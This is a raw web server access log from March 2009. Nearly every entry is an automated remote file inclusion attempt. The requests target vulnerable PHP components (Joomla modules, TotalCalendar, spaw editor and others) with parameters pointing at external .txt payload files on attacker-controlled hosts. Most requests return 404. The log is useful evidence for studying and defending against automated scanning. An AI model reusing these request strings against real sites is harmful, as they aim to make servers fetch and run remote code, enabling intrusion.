80.67.26.159 - - [13/Mar/2009:03:43:58 -0500] "GET /logs/access_log.1212019200%20%20//membership/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:06 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:06 -0500] "GET /logs/access_log.1217289600%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:06 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:09 -0500] "GET /logs/access_log.1217116800%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:09 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:09 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:10 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:10 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:12 -0500] "GET /logs/access_log.1217116800%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:25 -0500] "GET /logs/access_log.1217289600%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:25 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:25 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:30 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:30 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:30 -0500] "GET /logs/access_log.1217289600//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:34 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:34 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:35 -0500] "GET /logs/access_log.1217289600//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:44:40 -0500] "GET /logs/access_log.1216425600%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
65.254.49.34 - - [13/Mar/2009:03:44:46 -0500] "GET /logs/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
65.254.49.34 - - [13/Mar/2009:03:44:46 -0500] "GET /index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
211.202.2.220 - - [13/Mar/2009:03:44:58 -0500] "GET /logs/access_log.1216425600%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:21 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:21 -0500] "GET /logs/access_log.1217289600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:21 -0500] "GET /logs/access_log.1216425600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:21 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:23 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:24 -0500] "GET /logs/access_log.1217289600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:24 -0500] "GET /logs/access_log.1216425600///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:45:24 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:45:32 -0500] "GET /logs/access_log.1216684800//membership/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 360 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:16 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:18 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:18 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:18 -0500] "GET /logs/access_log.1211328000%20%20//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:21 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:23 -0500] "GET /logs/access_log.1211328000%20%20//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:24 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:25 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:25 -0500] "GET /logs/access_log.1211328000//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:25 -0500] "GET /logs/access_log.1206576000//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:30 -0500] "GET /logs/access_log.1206576000%20%20//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:31 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:31 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:31 -0500] "GET /logs/access_log.1211328000//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:31 -0500] "GET /logs/access_log.1206576000//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:47:32 -0500] "GET /logs/access_log.1206576000%20%20//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:47:54 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:47:54 -0500] "GET /logs/access_log.1211328000//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:47:54 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:47:55 -0500] "GET /logs/access_log.1206576000//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
222.239.78.166 - - [13/Mar/2009:03:48:32 -0500] "GET //?_zb_path=http://funlandgames.com.au/images/copyright.txt???? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
222.239.78.166 - - [13/Mar/2009:03:48:32 -0500] "GET /logs/access_log.1217289600//?_zb_path=http://funlandgames.com.au/images/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
222.239.78.166 - - [13/Mar/2009:03:48:38 -0500] "GET /logs//?_zb_path=http://funlandgames.com.au/images/copyright.txt???? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:49:54 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:49:54 -0500] "GET /logs/access_log.1211328000%20%20//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:49:54 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:03:50:28 -0500] "GET /logs/access_log.1206576000%20%20//modules/TotalCalendar/about.php?inc_dir=http://gumansin.com/id.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:53:41 -0500] "GET /logs/access_log.1214697600//admin/editor2/spaw_control.class.php?spaw_root=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:53:41 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:53:41 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:03:54:12 -0500] "GET /logs/access_log.1210550400//admin/editor2/spaw_control.class.php?spaw_root=http://roadone.net//board/data/photo/db/fatal1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:55:38 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:55:41 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:55:41 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=http://gumansin.com/id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:55:41 -0500] "GET /logs/access_log.1219536000%20%20//components/com_simpleboard/image_upload.php?sbp=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:55:43 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://gumansin.com/id.txt?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:03:55:46 -0500] "GET /logs/access_log.1219536000%20%20//components/com_simpleboard/image_upload.php?sbp=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
72.30.142.163 - - [13/Mar/2009:03:56:08 -0500] "GET /costume/costume2.htm HTTP/1.0" 200 1810 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.40.226.34 - - [13/Mar/2009:03:57:37 -0500] "GET /logs/access_log.1217548800/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
78.40.226.34 - - [13/Mar/2009:03:57:38 -0500] "GET /index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
78.40.226.34 - - [13/Mar/2009:03:57:38 -0500] "GET /logs/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
78.40.226.34 - - [13/Mar/2009:03:57:42 -0500] "GET /logs/access_log.1217462400/index.php?dept=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
80.67.26.159 - - [13/Mar/2009:04:07:40 -0500] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 326 "-""Mozilla/5.0"
80.67.26.159 - - [13/Mar/2009:04:07:51 -0500] "GET /logs/access_log.1226793600//include/scripts/export_batch.inc.php?DIR=http://roadone.net//board/data/photo/db/fatal1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
91.93.97.106 - - [13/Mar/2009:04:11:05 -0500] "GET /logs//galeria.php?start=0&kategoria=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
91.93.97.106 - - [13/Mar/2009:04:11:05 -0500] "GET //galeria.php?start=0&kategoria=http://oursoultvxq.com/bbs/data/vip/id2.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.221.130.17 - - [13/Mar/2009:04:16:33 -0500] "GET //include/lib.inc.php?site_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
77.221.130.17 - - [13/Mar/2009:04:16:33 -0500] "GET /logs/access_log.1216944000//include/lib.inc.php?site_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
77.221.130.17 - - [13/Mar/2009:04:16:33 -0500] "GET /logs//include/lib.inc.php?site_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:04:16:37 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:16:37 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:16:38 -0500] "GET /logs/access_log.1219536000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
61.110.18.100 - - [13/Mar/2009:04:16:43 -0500] "GET /logs//poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
61.110.18.100 - - [13/Mar/2009:04:16:43 -0500] "GET /logs/access_log.1211760000//poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
61.110.18.100 - - [13/Mar/2009:04:16:46 -0500] "GET //poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:04:16:51 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:16:51 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:16:52 -0500] "GET /logs/access_log.1219536000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
77.221.130.17 - - [13/Mar/2009:04:17:00 -0500] "GET /logs/access_log.1219536000//include/lib.inc.php?site_path=http://channels.dal.net/har/id.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:04:17:07 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:07 -0500] "GET /logs/access_log.1219536000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:08 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:17:14 -0500] "GET ///?error=http://gumansin.com/id.txt?? HTTP/1.1" 200 1244 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:28 -0500] "GET /logs/access_log.1216684800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:17:34 -0500] "GET ///?error=http://gumansin.com/id.txt?? HTTP/1.1" 200 1244 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:17:35 -0500] "GET /logs/access_log.1216684800///?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:39 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:39 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:39 -0500] "GET /logs/access_log.1219536000///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:17:41 -0500] "GET /logs///?error=http://gumansin.com/id.txt?? HTTP/1.1" 200 122045 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:43 -0500] "GET /logs/access_log.1216684800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:17:48 -0500] "GET ///?error=http://gumansin.com/id.txt?? HTTP/1.1" 200 1244 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:17:49 -0500] "GET /logs/access_log.1216684800///?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:17:49 -0500] "GET /logs///?error=http://gumansin.com/id.txt?? HTTP/1.1" 200 122045 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:17:55 -0500] "GET /logs/access_log.1216684800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:18:02 -0500] "GET /logs///?error=http://gumansin.com/id.txt?? HTTP/1.1" 200 122045 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:04:18:03 -0500] "GET /logs/access_log.1216684800///?error=http://gumansin.com/id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:18:26 -0500] "GET /logs/access_log.1216684800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 384 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:18:52 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:18:52 -0500] "GET /logs/access_log.1219536000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:18:52 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:01 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:01 -0500] "GET /logs/access_log.1219536000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:02 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:17 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:17 -0500] "GET /logs/access_log.1219536000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:17 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
61.110.18.100 - - [13/Mar/2009:04:19:26 -0500] "GET /logs/access_log.1211932800//poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
61.110.18.100 - - [13/Mar/2009:04:19:26 -0500] "GET //poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
61.110.18.100 - - [13/Mar/2009:04:19:26 -0500] "GET /logs//poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:04:19:29 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:29 -0500] "GET /logs/access_log.1219536000%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:19:30 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
61.110.18.100 - - [13/Mar/2009:04:19:31 -0500] "GET /logs/access_log.1211760000//poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
61.110.18.100 - - [13/Mar/2009:04:19:31 -0500] "GET /logs/access_log.1217030400//poll/pollphp/textfile//admin/common.inc.php?act=http://www.car-wood.com/board/////skin/zero_vote/idd.txt?? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
65.254.49.34 - - [13/Mar/2009:04:20:26 -0500] "GET /logs/access_log.1217030400//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.outbreak.castnet.org.au/safe.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
211.202.2.220 - - [13/Mar/2009:04:20:40 -0500] "GET /logs/access_log.1217116800%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:04:20:54 -0500] "GET /logs/access_log.1217116800%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 386 "-""Mozilla/5.0"
67.192.251.146 - - [13/Mar/2009:04:20:57 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.littleauctionbay.com/raid.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
